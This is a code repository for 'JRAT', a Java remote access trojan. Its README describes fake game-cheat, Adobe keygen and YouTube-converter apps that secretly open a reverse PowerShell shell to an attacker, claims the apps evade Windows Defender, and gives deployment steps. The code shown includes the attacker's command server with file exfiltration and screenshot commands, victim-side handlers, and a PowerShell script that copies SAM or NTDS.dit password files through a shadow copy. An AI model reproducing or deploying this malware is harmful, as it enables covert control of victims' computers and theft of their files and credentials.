├── .gitignore
├── Attacker
├── lib
│ └── commons-io-2.6.jar
├── resources
│ ├── Get-PasswordFile.ps1
│ └── Take-ScreenShot.ps1
└── src
│ ├── commands
│ ├── Command.java
│ ├── CommandManager.java
│ ├── EndCommand.java
│ ├── GetCommand.java
│ ├── HelpCommand.java
│ ├── ScreenShotCommand.java
│ └── SendCommand.java
│ ├── connection
│ ├── Connection.java
│ └── Server.java
│ └── launcher
│ └── Main.java
├── README.md
├── Victim [CSGOHacks]
├── lib
│ ├── commons-io-2.6.jar
│ └── jPowerShell-3.1.1.jar
├── resources
│ ├── background.jpg
│ ├── csgo.ico
│ └── title.png
└── src
│ ├── commands
│ ├── Command.java
│ ├── CommandManager.java
│ ├── EndCommand.java
│ ├── GetCommand.java
│ ├── ScreenShotCommand.java
│ └── SendCommand.java
│ ├── connection
│ ├── Client.java
│ └── Controller.java
│ ├── launcher
│ └── Main.java
│ └── view
│ └── MainWindow.java
├── Victim [KeyGen]
├── lib
│ ├── commons-io-2.6.jar
│ └── jPowerShell-3.1.1.jar
├── resources
│ ├── adobePremier.png
│ ├── afterEffects.png
│ ├── illustrator.png
│ ├── inDesign.png
│ ├── lightRoom.png
│ └── photoShop.png
└── src
│ ├── commands
│ ├── Command.java
│ ├── CommandManager.java
│ ├── EndCommand.java
│ ├── GetCommand.java
│ ├── ScreenShotCommand.java
│ └── SendCommand.java
│ ├── connection
│ ├── Client.java
│ └── Controller.java
│ ├── launcher
│ └── Main.java
│ └── view
│ └── MainWindow.java
├── Victim [RAW]
├── lib
│ ├── commons-io-2.6.jar
│ └── jPowerShell-3.1.1.jar
└── src
│ ├── commands
│ ├── Command.java
│ ├── CommandManager.java
│ ├── EndCommand.java
│ ├── GetCommand.java
│ ├── ScreenShotCommand.java
│ └── SendCommand.java
│ ├── connection
│ ├── Client.java
│ └── Controller.java
│ └── launcher
│ └── Main.java
├── Victim [YoutubeMP3]
├── lib
│ ├── commons-io-2.6.jar
│ └── jPowerShell-3.1.1.jar
├── src
│ ├── commands
│ │ ├── Command.java
│ │ ├── CommandManager.java
│ │ ├── EndCommand.java
│ │ ├── GetCommand.java
│ │ ├── ScreenShotCommand.java
│ │ └── SendCommand.java
│ ├── connection
│ │ ├── Client.java
│ │ └── Controller.java
│ ├── launcher
│ │ └── Main.java
│ └── view
│ │ └── MainWindow.java
└── youtubeMP3.png
└── git resources
├── console.jpg
├── csgo.png
├── keyGen.png
└── youtubeMP3.png
/.gitignore:
--------------------------------------------------------------------------------
1 | # Compiled class file
2 | *.class
3 |
4 | # Log file
5 | *.log
6 |
7 | # BlueJ files
8 | *.ctxt
9 |
10 | # Mobile Tools for Java (J2ME)
11 | .mtj.tmp/
12 |
13 | # Package Files #
14 | *.war
15 | *.nar
16 | *.ear
17 | *.zip
18 | *.tar.gz
19 | *.rar
20 |
21 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
22 | hs_err_pid*
23 | *.metadata
24 | *.prefs
25 | *.project
26 | *.classpath
27 | *.project
28 | */bin/
29 |
--------------------------------------------------------------------------------
/Attacker/lib/commons-io-2.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Attacker/lib/commons-io-2.6.jar
--------------------------------------------------------------------------------
/Attacker/resources/Get-PasswordFile.ps1:
--------------------------------------------------------------------------------
1 | function Get-PasswordFile {
2 | <#
3 | .SYNOPSIS
4 |
5 | Copies either the SAM or NTDS.dit and system files to a specified directory.
6 |
7 | .PARAMETER DestinationPath
8 |
9 | Specifies the directory to the location where the password files are to be copied.
10 |
11 | .OUTPUTS
12 |
13 | None or an object representing the copied items.
14 |
15 | .EXAMPLE
16 |
17 | Get-PasswordFile "c:\temp"
18 |
19 | #>
20 |
21 | [CmdletBinding()]
22 | Param
23 | (
24 | [Parameter(Mandatory = $true, Position = 0)]
25 | [ValidateScript({Test-Path $_ -PathType 'Container'})]
26 | [ValidateNotNullOrEmpty()]
27 | [String]
28 | $DestinationPath
29 | )
30 |
31 | function Copy-RawItem
32 | {
33 |
34 | [CmdletBinding()]
35 | [OutputType([System.IO.FileSystemInfo])]
36 | Param (
37 | [Parameter(Mandatory = $True, Position = 0)]
38 | [ValidateNotNullOrEmpty()]
39 | [String]
40 | $Path,
41 |
42 | [Parameter(Mandatory = $True, Position = 1)]
43 | [ValidateNotNullOrEmpty()]
44 | [String]
45 | $Destination,
46 |
47 | [Switch]
48 | $FailIfExists
49 | )
50 |
51 | $mscorlib = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ($_.Location.Split('\')[-1] -eq 'mscorlib.dll')}
52 | $Win32Native = $mscorlib.GetType('Microsoft.Win32.Win32Native')
53 | $CopyFileMethod = $Win32Native.GetMethod('CopyFile', ([Reflection.BindingFlags] 'NonPublic, Static'))
54 |
55 | $CopyResult = $CopyFileMethod.Invoke($null, @($Path, $Destination, ([Bool] $PSBoundParameters['FailIfExists'])))
56 |
57 | $HResult = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
58 |
59 | if ($CopyResult -eq $False -and $HResult -ne 0)
60 | {
61 | throw ( New-Object ComponentModel.Win32Exception )
62 | }
63 | else
64 | {
65 | Write-Output (Get-ChildItem $Destination)
66 | }
67 | }
68 |
69 | if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
70 | {
71 | Write-Error "Not running as admin. Run the script with elevated credentials"
72 | Return
73 | }
74 |
75 | $VssStartMode = (Get-WmiObject -Query "Select StartMode From Win32_Service Where Name='vss'").StartMode
76 | if ($VssStartMode -eq "Disabled") {Set-Service vss -StartUpType Manual}
77 |
78 | $VssStatus = (Get-Service vss).status
79 | if ($VssStatus -ne "Running") {Start-Service vss}
80 | $DomainRole = (Get-WmiObject Win32_ComputerSystem).DomainRole
81 | $IsDC = $False
82 | if ($DomainRole -gt 3) {
83 | $IsDC = $True
84 | $NTDSLocation = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\services\NTDS\Parameters)."DSA Database File"
85 | $FileDrive = ($NTDSLocation).Substring(0,3)
86 | } else {$FileDrive = $Env:HOMEDRIVE + '\'}
87 | $WmiClass = [WMICLASS]"root\cimv2:Win32_ShadowCopy"
88 | $ShadowCopy = $WmiClass.create($FileDrive, "ClientAccessible")
89 | $ReturnValue = $ShadowCopy.ReturnValue
90 |
91 | if ($ReturnValue -ne 0) {
92 | Write-Error "Shadow copy failed with a value of $ReturnValue"
93 | Return
94 | }
95 |
96 | $ShadowID = $ShadowCopy.ShadowID
97 | $ShadowVolume = (Get-WmiObject Win32_ShadowCopy | Where-Object {$_.ID -eq $ShadowID}).DeviceObject
98 |
99 | if ($IsDC -ne $true) {
100 |
101 | $SamPath = Join-Path $ShadowVolume "\Windows\System32\Config\sam"
102 | $SystemPath = Join-Path $ShadowVolume "\Windows\System32\Config\system"
103 |
104 | Copy-RawItem $SamPath "$DestinationPath\sam"
105 | Copy-RawItem $SystemPath "$DestinationPath\system"
106 | } else {
107 |
108 | $NTDSPath = Join-Path $ShadowVolume "\Windows\NTDS\NTDS.dit"
109 | $SystemPath = Join-Path $ShadowVolume "\Windows\System32\Config\system"
110 |
111 | Copy-RawItem $NTDSPath "$DestinationPath\ntds"
112 | Copy-RawItem $SystemPath "$DestinationPath\system"
113 | }
114 |
115 | If ($VssStatus -eq "Stopped") {Stop-Service vss}
116 | If ($VssStartMode -eq "Disabled") {Set-Service vss -StartupType Disabled}
117 | }
--------------------------------------------------------------------------------
/Attacker/resources/Take-ScreenShot.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Attacker/resources/Take-ScreenShot.ps1
--------------------------------------------------------------------------------
/Attacker/src/commands/Command.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Connection;
6 | import connection.Server;
7 |
8 | public abstract class Command {
9 | protected String _commandName;
10 | protected String _argument;
11 | protected String _help;
12 |
13 | public Command(String commandName, String argument, String help) {
14 | _commandName = commandName;
15 | _argument = argument;
16 | _help = help;
17 | }
18 |
19 | public abstract void execute(Connection con, Server server) throws IOException, InterruptedException;
20 |
21 | protected boolean parse(String command) {
22 | return _commandName.equals(command);
23 | }
24 |
25 | protected String getHelp() {
26 | return " [" + _commandName + "]" + (_argument==null ? "" : ("[" + _argument + "]")) + ": " + _help + "\n";
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/Attacker/src/commands/CommandManager.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Connection;
6 | import connection.Server;
7 |
8 | public class CommandManager {
9 | private static Command[] commands = {new HelpCommand(), new EndCommand(), new GetCommand(), new SendCommand(), new ScreenShotCommand()};
10 |
11 | public static void parseCommand(String command, Connection con, Server server) throws IOException, InterruptedException {
12 | boolean parsed = false;
13 |
14 | for(Command c : commands) {
15 | if(c.parse(command)) {
16 | c.execute(con, server);
17 | parsed = true;
18 | }
19 | }
20 | if(!parsed) {
21 | System.out.println(con.send(command));
22 | }
23 | }
24 |
25 | protected static String help() {
26 | String helpMessage = "";
27 |
28 | for(Command c : commands) {
29 | helpMessage += c.getHelp();
30 | }
31 |
32 | return helpMessage;
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/Attacker/src/commands/EndCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Connection;
6 | import connection.Server;
7 |
8 | public class EndCommand extends Command{
9 |
10 | public EndCommand() {
11 | super("endcon", null, "ends the connection");
12 | }
13 |
14 | @Override
15 | public void execute(Connection con, Server server) throws IOException, InterruptedException {
16 | System.out.println(con.send(_commandName));
17 | con.end();
18 | }
19 |
20 | }
21 |
--------------------------------------------------------------------------------
/Attacker/src/commands/GetCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Connection;
6 | import connection.Server;
7 |
8 | public class GetCommand extends Command{
9 | private String _command;
10 |
11 | public GetCommand() {
12 | super("get", "\"file/dir\"", "compress and sends the specified file/dir to the attacker machine");
13 | }
14 |
15 | protected boolean parse(String command) {
16 | boolean ok = false;
17 |
18 | if(command.contains(_commandName)) {
19 | _command = command;
20 | ok = true;
21 | }
22 |
23 | return ok;
24 | }
25 |
26 | @Override
27 | public void execute(Connection con, Server server) throws IOException, InterruptedException {
28 | String response = con.send(_command);
29 | System.out.println(response);
30 |
31 | if(response.contains("File compressed")) {
32 | server.receiveFile();
33 | }
34 | }
35 | }
--------------------------------------------------------------------------------
/Attacker/src/commands/HelpCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 | import java.util.Scanner;
5 |
6 | import connection.Connection;
7 | import connection.Server;
8 |
9 | public class HelpCommand extends Command{
10 |
11 | public HelpCommand() {
12 | super("help", null, "Show this message + PowerShell help message");
13 | }
14 |
15 | @Override
16 | public void execute(Connection con, Server server) throws IOException, InterruptedException {
17 | Scanner in = new Scanner(System.in);
18 |
19 | System.out.println("\nAvailable commands:\n");
20 | System.out.println(CommandManager.help());
21 | System.out.println("\nDisplay PowerShell help message? [y/n] (enter to skip)");
22 | String op = in.nextLine();
23 | if(op.equals("y")) {
24 | System.out.println(con.send("help"));
25 | }
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/Attacker/src/commands/ScreenShotCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 |
6 | import connection.Connection;
7 | import connection.Server;
8 |
9 | public class ScreenShotCommand extends Command{
10 |
11 | public ScreenShotCommand() {
12 | super("screenshot", null, "(PowerShell script doesn't work) takes a screenshot of the victim machine and sends it to the attacker machine");
13 | }
14 |
15 | @Override
16 | public void execute(Connection con, Server server) throws IOException, InterruptedException {
17 | con.simpleSend(_commandName);
18 |
19 | File screenShotScript = new File("resources/Take-ScreenShot.ps1");
20 | server.sendFile(screenShotScript);
21 | System.out.println("Taking the screenshot...");
22 | String response = con.receive();
23 | System.out.println(response);
24 | if(response.equals("Screenshot taken")) {
25 | server.receiveFile();
26 | }
27 | }
28 |
29 | }
30 |
--------------------------------------------------------------------------------
/Attacker/src/commands/SendCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 |
6 | import connection.Connection;
7 | import connection.Server;
8 |
9 | public class SendCommand extends Command{
10 | private String _fileName;
11 | private String _command;
12 |
13 | public SendCommand() {
14 | super("send", "\"file/directory\"", "sends the specified file/directory to the victim machine");
15 | }
16 |
17 | protected boolean parse(String command) {
18 | boolean ok = false;
19 |
20 | if(command.contains(_commandName)) {
21 | _command = command;
22 | _fileName = command.split("\"")[1];
23 | ok = true;
24 | }
25 |
26 | return ok;
27 | }
28 |
29 | @Override
30 | public void execute(Connection con, Server server) throws IOException, InterruptedException {
31 | File fileToSend = new File(_fileName);
32 |
33 | if(fileToSend.exists()) {
34 | con.simpleSend(_command);
35 | server.sendFile(fileToSend);
36 | }
37 | else {
38 | System.out.println("File not found");
39 | }
40 | }
41 |
42 | }
43 |
--------------------------------------------------------------------------------
/Attacker/src/connection/Connection.java:
--------------------------------------------------------------------------------
1 | package connection;
2 |
3 | import java.io.BufferedInputStream;
4 | import java.io.BufferedOutputStream;
5 | import java.io.DataInputStream;
6 | import java.io.DataOutputStream;
7 | import java.io.File;
8 | import java.io.FileInputStream;
9 | import java.io.FileOutputStream;
10 | import java.io.IOException;
11 | import java.io.InputStream;
12 | import java.io.OutputStream;
13 | import java.net.Socket;
14 |
15 | public class Connection {
16 | private Socket s;
17 | private DataOutputStream dout;
18 | private DataInputStream din;
19 | private String ip;
20 |
21 | public Connection(Socket socket) throws IOException {
22 | s = socket;
23 | din = new DataInputStream(s.getInputStream());
24 | dout = new DataOutputStream(s.getOutputStream());
25 | }
26 |
27 | public void end() throws IOException {
28 | dout.close();
29 | din.close();
30 | s.close();
31 | }
32 |
33 | public boolean connectionIsOpen() {
34 | return !s.isClosed();
35 | }
36 |
37 | public void simpleSend(String str) throws IOException {
38 | dout.writeUTF(str);
39 | dout.flush();
40 | }
41 |
42 | public String send(String str) throws IOException {
43 | dout.writeUTF(str);
44 | dout.flush();
45 |
46 | return din.readUTF();
47 | }
48 |
49 | public String receive() throws IOException {
50 | return din.readUTF();
51 | }
52 |
53 | protected void send(File file) throws IOException {
54 | int lenght = (int) file.length();
55 | dout.writeUTF(String.valueOf(lenght));
56 |
57 | byte [] mybytearray = new byte [(int)file.length()];
58 |
59 | InputStream in = new FileInputStream(file);
60 | BufferedInputStream bin = new BufferedInputStream(in);
61 | OutputStream out = s.getOutputStream();
62 |
63 | bin.read(mybytearray, 0, mybytearray.length);
64 | out.write(mybytearray,0, mybytearray.length);
65 |
66 | String response;
67 | do {
68 | response = din.readUTF();
69 | System.out.println(response);
70 | }while(!response.equals("Transfer completed") && !response.contains("Error"));
71 |
72 | //out.close() directly shuts down the socket
73 | out.close();
74 | in.close();
75 | bin.close();
76 | }
77 |
78 | protected void receive(String fileName) throws IOException {
79 | InputStream is;
80 | DataInputStream din;
81 | FileOutputStream out;
82 | BufferedOutputStream bos;
83 |
84 | try {
85 | is = s.getInputStream();
86 | din = new DataInputStream(is);
87 | out = new FileOutputStream(new File(fileName));
88 | bos = new BufferedOutputStream(out);
89 | } catch(IOException e) {
90 | System.out.println("Error: There was a problem initializing the transfer, retrying...");
91 | throw e;
92 | }
93 | try {
94 | //Client sends length of file
95 | int length = Integer.valueOf(din.readUTF());
96 | byte [] mybytearray = new byte [length];
97 | System.out.println("Receiving " + fileName + " (" + length + " bytes)");
98 |
99 | //is.read tries to read up to length, but may read less
100 | int bytesRead = is.read(mybytearray, 0, length);
101 | int current = bytesRead;
102 |
103 | while (current != length) {
104 | System.out.println(current + "/" + length);
105 | bytesRead = is.read(mybytearray, current, (length - current));
106 | if(bytesRead >= 0) {
107 | current += bytesRead;
108 | }
109 | }
110 |
111 | System.out.println("Transfer completed");
112 |
113 | bos.write(mybytearray, 0 , length);
114 | bos.flush();
115 | }catch(IOException e) {
116 | System.out.println("Error: The transfer couldn't be completed");
117 | }
118 |
119 | is.close();
120 | out.close();
121 | bos.close();
122 | }
123 |
124 | public String getSysInfo() throws IOException {
125 | String sysInfo = "[not found]";
126 |
127 | dout.writeUTF(" Invoke-RestMethod http://ipinfo.io/json | Select -exp ip");
128 | dout.flush();
129 | ip = din.readUTF();
130 | sysInfo = "\n" + "Ip: " + ip;
131 |
132 | dout.writeUTF(" Get-ComputerInfo | Select-Object WindowsRegisteredOwner, CsManufacturer, WindowsProductName, WindowsCurrentVersion | Format-List");
133 | dout.flush();
134 | sysInfo += din.readUTF();
135 |
136 | return sysInfo;
137 | }
138 |
139 | public String getIp() {
140 | return ip;
141 | }
142 | }
143 |
--------------------------------------------------------------------------------
/Attacker/src/connection/Server.java:
--------------------------------------------------------------------------------
1 | package connection;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 | import java.net.ServerSocket;
6 |
7 | public class Server {
8 | private ServerSocket ss;
9 |
10 | public Server(int port) throws IOException{
11 | ss = new ServerSocket(port);
12 | }
13 |
14 | public Connection connect() throws IOException{
15 | return new Connection(ss.accept());
16 | }
17 |
18 | public void receiveFile() {
19 | Thread t = new Thread() {
20 | public void run() {
21 | Connection temp = null;
22 | String fileName;
23 | try {
24 | do {
25 | temp = connect();
26 | fileName = temp.receive();
27 | //Waiting for auth as a sender socket (not connecting with hello)
28 | }while(fileName.equals("hello"));
29 | temp.receive(fileName);
30 | }catch(IOException e1){
31 | try{temp.end();}catch(IOException e2) {};
32 | }
33 | }
34 | };
35 | t.start();
36 | try{t.join();}catch(InterruptedException e) {};
37 | }
38 |
39 | public void sendFile(File file) {
40 | Thread t = new Thread() {
41 | public void run() {
42 | Connection temp = null;
43 | String hello;
44 | try {
45 | do {
46 | temp = connect();
47 | hello = temp.receive();
48 | //Waiting for auth as a receiver socket (not connecting with hello)
49 | }while(hello.equals("hello"));
50 | temp.send(file);
51 | }catch(IOException e1){
52 | try{temp.end();}catch(IOException e2) {};
53 | }
54 | }
55 | };
56 | t.start();
57 | try{t.join();}catch(InterruptedException e) {};
58 | }
59 | }
60 |
--------------------------------------------------------------------------------
/Attacker/src/launcher/Main.java:
--------------------------------------------------------------------------------
1 | package launcher;
2 |
3 | import java.io.IOException;
4 | import java.util.Scanner;
5 |
6 | import commands.CommandManager;
7 | import connection.Connection;
8 | import connection.Server;
9 |
10 | public class Main {
11 |
12 | public static void main(String[] args) throws IOException {
13 | int _port = 5123;
14 | Server server = new Server(_port);
15 | Scanner in = new Scanner(System.in);
16 | Connection mainConnection;
17 | String firstContact;
18 |
19 | System.out.println(asciiArt());
20 |
21 | while(true) {
22 | System.out.println("Waiting for connection on port " + _port + "...");
23 | do {
24 | mainConnection = server.connect();
25 | firstContact = mainConnection.receive();
26 | }while(!firstContact.equals("hello"));
27 | System.out.println("Connected");
28 | System.out.println("Retrieving system info...");
29 | System.out.println(mainConnection.getSysInfo());
30 |
31 | while(mainConnection.connectionIsOpen()) {
32 | try {
33 | System.out.print("\n> ");
34 | String command = in.nextLine();
35 | CommandManager.parseCommand(command, mainConnection, server);
36 | }catch(IOException | InterruptedException e){
37 | mainConnection.end();
38 | System.out.println("\nConnection interrupted :/ \n");
39 | }
40 | }
41 | }
42 | }
43 |
44 | private static String asciiArt() {
45 | String ascii = "\n";
46 |
47 | ascii += " /|\n";
48 | ascii += " / |\n";
49 | ascii += " /__|______\n";
50 | ascii += "| __ __ |\n";
51 | ascii += "| | || | |\n";
52 | ascii += "| |__||__| |\n";
53 | ascii += "| __ __()|\n";
54 | ascii += "| | || | | If it's already open... \n";
55 | ascii += "| | || | |\n";
56 | ascii += "| |__||__| | GitHub: @hacefresko \n";
57 | ascii += "|__________|\n";
58 |
59 | return ascii;
60 | }
61 | }
62 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # JRAT
2 |
3 | Set of fake Java applications with hidden backdoors made to learn about socket programming and backdoors.
4 |
5 | Each application triggers a reverse shell when executed, opening a PowerShell session. It also allows transfering files in both directions (use help command for more info). It only supports one connection at a time.
6 |
7 | None of the applications is blocked by WindowsDefender
8 |
9 | 
10 |
11 | ## Applications
12 |
13 | * RAW: Just the backdoor, without any masking application
14 | * CSGOHacks: Fake application to gain cheats for the game "Counter Strike: Global Offensive"
15 | * KeyGen: Fake key generator for some programs from the Adobe Suite
16 | * YoutubeMP3: Fake YouTube to mp3 converter
17 |
18 |
19 | 
20 | 
21 | 
22 |
23 | ## Usage
24 |
25 | * The attacker must run the Attacker project launched from launcher/main.java. It will create a server listening by default on port 5123 (this can be easily changed in main.java).
26 | * The application for the victim must be configured by specifying the attacker's IP and port. Then, it must be packed into a .jar file. I recommend using any application to convert the .jar to .exe such as Launch4j, although the vicitm still needs to have Java installed. When the victim executes the application, it will connect to the attacker's machine and will open the PowerShell session.
27 |
28 | ## Disclaimer
29 |
30 | This tool was written for learning purposes. Its usage against infrastructures without the consent of the owner can be considered as an illegal activity. Authors assume no liability and are not responsible for any misuse or damage caused by this program.
31 |
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/lib/commons-io-2.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [CSGOHacks]/lib/commons-io-2.6.jar
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/lib/jPowerShell-3.1.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [CSGOHacks]/lib/jPowerShell-3.1.1.jar
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/resources/background.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [CSGOHacks]/resources/background.jpg
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/resources/csgo.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [CSGOHacks]/resources/csgo.ico
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/resources/title.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacefresko/JavaRAT/3dfdf4f4916858956142e3e611b1ac0006ebfbb1/Victim [CSGOHacks]/resources/title.png
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/src/commands/Command.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public abstract class Command {
8 | protected String _commandName;
9 |
10 | public Command(String commandName) {
11 | _commandName = commandName;
12 | }
13 |
14 | public abstract void execute(Controller ctrl) throws IOException;
15 |
16 | protected boolean parse(String command) {
17 | return _commandName.equals(command);
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/src/commands/CommandManager.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class CommandManager {
8 | private static Command[] commands = {new EndCommand(), new GetCommand(), new SendCommand(), new ScreenShotCommand()};
9 |
10 | public static void parseCommand(String command, Controller ctrl) throws IOException {
11 | boolean parsed = false;
12 | int i = 0;
13 |
14 | while(!parsed && i < commands.length) {
15 | try {
16 | if(commands[i].parse(command)) {
17 | commands[i].execute(ctrl);
18 | parsed = true;
19 | }
20 | }catch(IllegalArgumentException e) {
21 | ctrl.sendMsg("Please, input a valid command >:(\nType help for more info");
22 | parsed = true;
23 | }
24 | i++;
25 | }
26 | if(!parsed) {
27 | ctrl.sendMsg(ctrl.execute(command));
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/src/commands/EndCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class EndCommand extends Command{
8 |
9 | public EndCommand() {
10 | super("endcon");
11 | }
12 |
13 | @Override
14 | public void execute(Controller ctrl) throws IOException {
15 | ctrl.sendMsg("Bye :(\n\n");
16 | ctrl.endConnection();
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/src/commands/GetCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.File;
4 | import java.io.FileInputStream;
5 | import java.io.FileOutputStream;
6 | import java.io.IOException;
7 | import java.util.ArrayList;
8 | import java.util.List;
9 | import java.util.zip.ZipEntry;
10 | import java.util.zip.ZipException;
11 | import java.util.zip.ZipOutputStream;
12 |
13 | import connection.Controller;
14 |
15 | public class GetCommand extends Command{
16 | private String _fileName;
17 | private List fileList;
18 |
19 | public GetCommand() {
20 | super("get");
21 | fileList = new ArrayList();
22 | }
23 |
24 | protected boolean parse(String command) {
25 | boolean ok = false;
26 |
27 | if(command.contains(_commandName)) {
28 | try {
29 | _fileName = command.split("\"")[1];
30 | }catch(Exception e) {
31 | throw new IllegalArgumentException();
32 | }
33 | ok = true;
34 | }
35 |
36 | return ok;
37 | }
38 |
39 | @Override
40 | public void execute(Controller ctrl) throws IOException {
41 | String path = ctrl.execute("Get-Item '" + _fileName + "' | Select-Object FullName | Format-List");
42 |
43 | File fileToCompress = new File(fetch(path));
44 | if(fileToCompress.exists()) {
45 | File fileCompressed = compress(fileToCompress, ctrl);
46 | if(fileCompressed.exists()) {
47 | ctrl.sendFile(fileCompressed);
48 | fileCompressed.delete();
49 | }
50 | } else {
51 | ctrl.sendMsg("The specified file/dir does not exists");
52 | }
53 | }
54 |
55 | private File compress(File fileToCompress, Controller ctrl){
56 | byte[] buffer = new byte[1024];
57 |
58 | try{
59 | String path = fileToCompress.getAbsolutePath();
60 | String zipPath = path + ".zip";
61 |
62 | FileOutputStream fos = new FileOutputStream(zipPath);
63 | ZipOutputStream zos = new ZipOutputStream(fos);
64 |
65 | if(fileToCompress.isFile()) {
66 | ZipEntry ze= new ZipEntry(_fileName);
67 | zos.putNextEntry(ze);
68 | FileInputStream in = new FileInputStream(path);
69 |
70 | int len;
71 | while ((len = in.read(buffer)) > 0) {
72 | zos.write(buffer, 0, len);
73 | }
74 |
75 | in.close();
76 |
77 | }
78 | else {
79 | generateFileList(fileToCompress);
80 |
81 | for(File file : fileList){
82 | try {
83 | ZipEntry ze= new ZipEntry(file.getName());
84 | zos.putNextEntry(ze);
85 | FileInputStream in = new FileInputStream(file.getAbsolutePath());
86 |
87 | int len;
88 | while ((len = in.read(buffer)) > 0) {
89 | zos.write(buffer, 0, len);
90 | }
91 | in.close();
92 | }catch(ZipException ex){
93 | //weird zip format exception when compressing some xml files
94 | }
95 | }
96 | }
97 | zos.closeEntry();
98 | zos.close();
99 | fos.close();
100 | ctrl.sendMsg("File compressed");
101 |
102 | return new File(zipPath);
103 | }catch(Exception e) {
104 | ctrl.sendMsg(e.getStackTrace().toString() + " " + e.getMessage());
105 | return null;
106 | }
107 | }
108 |
109 | private void generateFileList(File node){
110 | //add file only
111 | if(node.isFile()){
112 | fileList.add(node);
113 | }
114 | else if(node.isDirectory()){
115 | String[] subNote = node.list();
116 | for(String filename : subNote){
117 | generateFileList(new File(node, filename));
118 | }
119 | }
120 | }
121 |
122 | private static String fetch(String str) {
123 | boolean exit = false;
124 | int first = 0, i = 0;
125 |
126 | exit = false;
127 | while(i < str.length() && !exit) {
128 | char aux = str.charAt(i);
129 | if(aux == ':') {
130 | first = i;
131 | exit = true;
132 | }
133 | i++;
134 | }
135 |
136 | return str.substring(first + 2, str.length());
137 | }
138 |
139 | }
140 |
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/src/commands/ScreenShotCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 |
6 | import connection.Controller;
7 |
8 | public class ScreenShotCommand extends Command{
9 |
10 | public ScreenShotCommand() {
11 | super("screenshot");
12 | }
13 |
14 | @Override
15 | public void execute(Controller ctrl) throws IOException {
16 | // Current PowerShell script does not work properly :(
17 | ctrl.receiveFile("Take-ScreenShot.ps1");
18 | ctrl.execute(". .\\Take-ScreenShot.ps1");
19 | String path = ctrl.execute("Get-Location");
20 | path = path.split("\n")[3];
21 | path = path + "\\";
22 | path = path.replace("[", "`[");
23 | path = path.replace("]", "`]");
24 | ctrl.execute("Take-ScreenShot -file \"" + path + "screenshot.png\"");
25 | ctrl.sendMsg("Screenshot taken");
26 | File screenshot = new File("screenshot.png");
27 | ctrl.sendFile(screenshot);
28 | ctrl.execute("rm screenshot.png");
29 | }
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/Victim [CSGOHacks]/src/commands/SendCommand.java:
--------------------------------------------------------------------------------
1 | package commands;
2 |
3 | import java.io.IOException;
4 |
5 | import connection.Controller;
6 |
7 | public class SendCommand extends Command{
8 | private String _fileName;
9 |
10 | public SendCommand() {
11 | super("send");
12 | }
13 |
14 | protected boolean parse(String command) {
15 | boolean ok = false;
16 |
17 | if(command.contains(_commandName)) {
18 | try {
19 | _fileName = command.split("\"")[1];
20 | }catch(Exception e) {
21 | throw new IllegalArgumentException();
22 | }
23 | ok = true;
24 | }
25 |
26 | return ok;
27 | }
28 |
29 | @Override
30 | public void execute(Controller ctrl) throws IOException {
31 | ctrl.receiveFile(_fileName);
32 | }
33 |
34 | }
35 |
